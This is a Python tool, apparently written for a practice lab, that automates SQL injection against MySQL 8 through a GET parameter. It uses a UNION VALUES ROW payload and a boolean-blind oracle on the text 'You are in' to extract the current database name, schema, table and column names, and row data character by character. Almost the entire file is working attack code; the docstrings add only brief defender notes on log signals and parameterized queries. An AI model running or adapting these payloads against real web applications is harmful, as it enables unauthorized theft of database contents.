def current_db(url):
    """Read the current database name through an injected GET parameter.

    Interactive. Option 1 appends a ``UNION ... VALUES ROW(...)`` payload
    (MySQL 8 syntax) to *url* and prints the raw response body. Any other
    option recovers the name one character at a time with a boolean oracle:
    a probe is considered "true" when the response body contains the literal
    ``"You are in"``. For positions 1..39 every candidate in ``chars``
    (defined outside this chunk) is tried; the first position where no
    candidate matches ends the walk.

    Args:
        url: Base URL that the payload string is concatenated onto verbatim.

    Defender notes: every probe is a GET whose query carries the comment
    terminator ``--+`` together with ``database()`` / ``substr`` / ``ascii``,
    and the blind branch emits a burst of requests that differ only in two
    integers. Both are easy log / WAF signals; parameterized queries remove
    the injection point altogether. ``requests`` is imported outside this
    chunk.
    """
    print("利用mysql8新特性或普通布尔盲注:\n1.新特性(联合查询) 2.普通布尔盲注")
    print("请输入序号:",end='')
    num = int(input())
    if num == 1:
        # UNION query that returns the current database directly (editable).
        payload = "-1' union values row(1,database(),3)--+"
        urls = url + payload
        r = requests.get(url=urls)
        print(r.text)
    else:
        name=''
        # Boolean-blind probe: {0} is the 1-based character position,
        # {1} the ASCII code being tested (editable).
        payload = "1' and ascii(substr((database()),{0},1))={1}--+"
        for i in range(1,40):
            char=''  # stays '' when no candidate matched at this position
            for j in chars:
                payloads = payload.format(i,ord(j))
                urls = url + payloads
                r = requests.get(url=urls)
                if "You are in" in r.text:
                    name += j
                    print(name)  # progress: prefix recovered so far
                    char = j
                    break
            if char == '':
                # No candidate matched: the name is exhausted.
                break
def str2hex(name):
    """Return *name* as one ``0x``-prefixed hex literal.

    Each character's code point is rendered with ``hex()`` (no zero padding)
    and the per-character ``0x`` prefixes are stripped before a single
    ``0x`` is prepended, e.g. ``'ab'`` -> ``'0x6162'``. The callers in this
    file only pass characters in the range chr(32)..chr(125), which all
    render as exactly two hex digits.

    Args:
        name: String to encode.

    Returns:
        The hex literal as a str; ``''`` encodes to ``'0x'``.
    """
    res = ''
    for i in name:
        res += hex(ord(i))
    # hex() adds its own '0x' per character; collapse them into one prefix.
    res = '0x' + res.replace('0x','')
    return res
def dbs(url):
    """Recover schema names from ``information_schema.schemata`` row by row.

    Column-name-less boolean-blind technique: the probe compares a literal
    row tuple against the row selected by ``TABLE ... LIMIT n,1`` (MySQL 8
    ``TABLE`` statement). For each character position the candidate prefix
    is tested in ascending order; the first candidate for which the tuple
    sorts *above* the real row means the true character is the previous
    one, so ``chr(char-1)`` is appended. Up to 19 characters are read per
    name. Interactive: the 1-based row number is read from stdin; 0 or a
    negative number exits.

    Args:
        url: Base URL the payload is concatenated onto verbatim.

    Defender notes: requests referencing ``information_schema.schemata`` with
    a ``--+`` terminator, arriving in runs of up to 94 near-identical
    probes per character, are a clear detection signal. The oracle string
    ``'You are in'`` is the application's own success text.
    """
    while True:
        print("请输入要爆第几个数据库,如:1,2等:",end='')
        x = int(input())-1  # user enters 1-based; LIMIT offset is 0-based
        num = str(x)
        if x < 0:
            break
        # {} receives the hex literal built by str2hex (editable).
        payload = "1' and ('def',{},'',4,5,6)>(table information_schema.schemata limit "+num+",1)--+"
        name = ''
        for i in range(1,20):
            hexchar = ''
            for char in range(32, 126):
                hexchar = str2hex(name + chr(char))
                payloads = payload.format(hexchar)
                #print(payloads)
                urls = url + payloads
                r = requests.get(url=urls)
                if 'You are in' in r.text:
                    # Tuple sorted above the row: the real character is one lower.
                    name += chr(char-1)
                    print(name)  # progress: prefix recovered so far
                    break
def tables_n(url,database):
    """Find the first ``information_schema.tables`` row belonging to *database*.

    Scans ``LIMIT i,1`` for i in 0..9999. At the first row where the tuple
    built from *database* sorts below the row, a second probe is sent with
    the last character of *database* incremented by one; if that tuple does
    not also sort below the row, the author takes i as the starting row of
    this schema's tables (presumably to reject matches on a later schema —
    verify against the intended ordering). The local *database* is rebound
    in the process; the caller's value is unaffected.

    Args:
        url: Base URL the payload is concatenated onto verbatim.
        database: Schema name embedded verbatim into the SQL string.

    Returns:
        The 0-based row offset at which this schema's tables begin.

    Raises:
        UnboundLocalError: if no row in 0..9999 matches, because ``n`` is
        only assigned inside the matching branch.
    """
    payload = "1' and ('def','"+database+"','','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<(table information_schema.tables limit {},1)--+"
    for i in range(0,10000):
        payloads = payload.format(i)
        urls = url + payloads
        r = requests.get(url=urls)
        if 'You are in' in r.text:
            # Increment the last character of the schema name for the check probe.
            char = chr(ord(database[-1])+1)
            database = database[0:-1]+char
            payld = "1' and ('def','"+database+"','','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<(table information_schema.tables limit "+str(i)+",1)--+"
            urls = url + payld
            res = requests.get(url=urls)
            #print(i)
            if 'You are in' not in res.text:
                print('从第',i,'行开始爆数据表')  # report the starting row
                n = i
                break
    return n
def tables(url,database,n):
    """Recover table names of *database* from ``information_schema.tables``.

    Same column-name-less boolean-blind walk as ``dbs``: a literal tuple is
    compared against ``TABLE information_schema.tables LIMIT row,1`` where
    ``row`` is the user's 1-based choice minus one plus the offset *n*
    (as returned by ``tables_n``). Candidates are tried in ascending order
    and the first one whose tuple sorts above the real row yields
    ``chr(char-1)``; up to 19 characters are read per name. Entering 0 or a
    negative number exits.

    Args:
        url: Base URL the payload is concatenated onto verbatim.
        database: Schema name embedded verbatim into the SQL string.
        n: 0-based row offset of the schema's first table.

    Defender notes: the ``information_schema.tables`` reference plus the
    ``--+`` terminator and the per-character burst of probes are the
    observable pattern; the response text ``'You are in'`` is the oracle.
    """
    while True:
        print("请输入要爆第几个数据表,如:1,2等:",end='')
        x = int(input())-1  # user enters 1-based
        num = str(x + n)    # shift by the schema's starting row
        if x < 0:
            break
        # {} receives the hex literal built by str2hex (editable).
        payload = "1' and ('def','"+database+"',{},'',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)>(table information_schema.tables limit "+num+",1)--+"
        name = ''
        for i in range(1,20):
            hexchar = ''
            for char in range(32, 126):
                hexchar = str2hex(name + chr(char))
                payloads = payload.format(hexchar)
                #print(payloads)
                urls = url + payloads
                r = requests.get(url=urls)
                if 'You are in' in r.text:
                    # Tuple sorted above the row: the real character is one lower.
                    name += chr(char-1)
                    print(name)  # progress: prefix recovered so far
                    break
def columns_n(url,database,table):
    """Find the first ``information_schema.columns`` row for *database.table*.

    Mirrors ``tables_n`` but scans ``LIMIT i,1`` for i in 3000..9999 (the
    lower bound is hard-coded) and increments the last character of *table*
    for the confirmation probe. The local *table* is rebound in the process;
    the caller's value is unaffected.

    Args:
        url: Base URL the payload is concatenated onto verbatim.
        database: Schema name embedded verbatim into the SQL string.
        table: Table name embedded verbatim into the SQL string.

    Returns:
        The 0-based row offset at which this table's columns begin.

    Raises:
        UnboundLocalError: if no row in 3000..9999 matches, because ``n`` is
        only assigned inside the matching branch.
    """
    payload = "1' and ('def','"+database+"','"+table+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<(table information_schema.columns limit {},1)--+"
    for i in range(3000,10000):
        payloads = payload.format(i)
        urls = url + payloads
        r = requests.get(url=urls)
        if 'You are in' in r.text:
            # Increment the last character of the table name for the check probe.
            char = chr(ord(table[-1])+1)
            table = table[0:-1]+char
            payld = "1' and ('def','"+database+"','"+table+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<(table information_schema.columns limit "+str(i)+",1)--+"
            urls = url + payld
            res = requests.get(url=urls)
            #print(i)
            if 'You are in' not in res.text:
                print('从第',i,'行开始爆字段')  # report the starting row
                n = i
                break
    return n
def columns(url,database,table,n):
    """Recover column names of *database.table* from ``information_schema.columns``.

    Same column-name-less boolean-blind walk as ``tables``: the literal
    tuple is compared against ``TABLE information_schema.columns LIMIT
    row,1`` with ``row`` = user's 1-based choice minus one plus *n* (from
    ``columns_n``). Ascending candidates; the first tuple that sorts above
    the real row yields ``chr(char-1)``; up to 19 characters per name.
    Entering 0 or a negative number exits.

    Args:
        url: Base URL the payload is concatenated onto verbatim.
        database: Schema name embedded verbatim into the SQL string.
        table: Table name embedded verbatim into the SQL string.
        n: 0-based row offset of the table's first column.

    Defender notes: probes reference ``information_schema.columns`` with a
    ``--+`` terminator and arrive in per-character bursts; the response
    text ``'You are in'`` is the oracle.
    """
    while True:
        print("请输入要爆第几个字段,如:1,2等:",end='')
        x = int(input())-1  # user enters 1-based
        num = str(x + n)    # shift by the table's starting row
        if x < 0:
            break
        # {} receives the hex literal built by str2hex (editable).
        payload = "1' and ('def','"+database+"','"+table+"',{},'',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)>(table information_schema.columns limit "+num+",1)--+"
        name = ''
        for i in range(1,20):
            hexchar = ''
            for char in range(32, 126):
                hexchar = str2hex(name + chr(char))
                payloads = payload.format(hexchar)
                #print(payloads)
                urls = url + payloads
                r = requests.get(url=urls)
                if 'You are in' in r.text:
                    # Tuple sorted above the row: the real character is one lower.
                    name += chr(char-1)
                    print(name)  # progress: prefix recovered so far
                    break
def datas(url,table):
    """Recover the second column of row *x* of *table* character by character.

    The literal tuple ``(x, <hex>, '')`` is compared against
    ``TABLE <table> LIMIT x-1,1``, so the probe only works when the row's
    first column equals its 1-based position ``x`` — presumably an
    auto-increment id; confirm against the target schema. Same ascending
    candidate walk as the other ``*`` functions: the first tuple that sorts
    above the real row yields ``chr(char-1)``; up to 19 characters are read.
    Entering 0 or a negative number exits.

    Args:
        url: Base URL the payload is concatenated onto verbatim.
        table: Table name embedded verbatim into the SQL string.

    Defender notes: a ``TABLE <name> LIMIT`` statement inside a user-supplied
    parameter, closed with ``--+``, plus the per-character burst of probes,
    is the observable pattern; the response text ``'You are in'`` is the
    oracle.
    """
    while True:
        print("请输入要爆第几个数据,如:1,2等:",end='')
        x = int(input())   # 1-based row number; also used as the id guess
        y = x-1            # 0-based LIMIT offset
        num = str(y)
        if y < 0:
            break
        # {} receives the hex literal built by str2hex (editable).
        payload = "1' and ("+str(x)+",{},'')>(table "+table+" limit "+num+",1)--+"
        name = ''
        for i in range(1,20):
            hexchar = ''
            for char in range(32, 126):
                hexchar = str2hex(name + chr(char))
                payloads = payload.format(hexchar)
                #print(payloads)
                urls = url + payloads
                r = requests.get(url=urls)
                if 'You are in' in r.text:
                    # Tuple sorted above the row: the real character is one lower.
                    name += chr(char-1)
                    print(name)  # progress: prefix recovered so far
                    break